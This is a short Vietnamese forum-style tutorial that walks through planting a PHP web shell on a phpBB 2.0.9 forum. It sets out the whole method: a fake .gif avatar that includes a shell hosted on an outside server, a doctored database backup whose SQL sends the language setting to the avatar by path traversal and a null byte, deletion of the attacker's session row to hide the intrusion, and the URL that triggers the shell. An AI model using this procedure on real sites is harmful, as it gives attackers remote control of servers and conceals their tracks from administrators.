include shell với phpBB
phpBB version : 2.0.9
chuẩn bị sẵn 1 con shell
upload shell txt lên host nào đó
chèn đoạn code sau vào notepad roài save với đuôi .gif
<php include “http://link…/shell.txt”; ?>
khi ta đã vào dc admincp của phpBB
chuyển tới config … chọn cho upload avatar = Yes
Sau đó backup lại database
Vô lại usercp upload cái ảnh include shell lên
sau đó xem tên ảnh avatar sau khi upload là gì nhé
Sau khi download backup về mở nó ra
tìm dòng :
Insert into phpbb_config (config_name, config_value) Values (‘default_lang’, ‘english’);
chèn thêm:
update phpbb_config set configvalue=concat(‘english/../../images/avatars/tên file ảnh bạn đã up.gif’, char(0)) where config_name=’default_lang’;
sau đó search phpBB_sessions
dưới insert to
thêm
delete from phpbb_sesions where session_id=’ ở chỗ này bạn nhìn lên cái dòng insert to gần cuối có cái value của mình thì chèn nó vào đây ‘;
chỗ này nhằm xóa dấu vết thoai
xong roài
giờ save
roài restore lại thoai
Restore xong vào http://site/phpBB/faq.php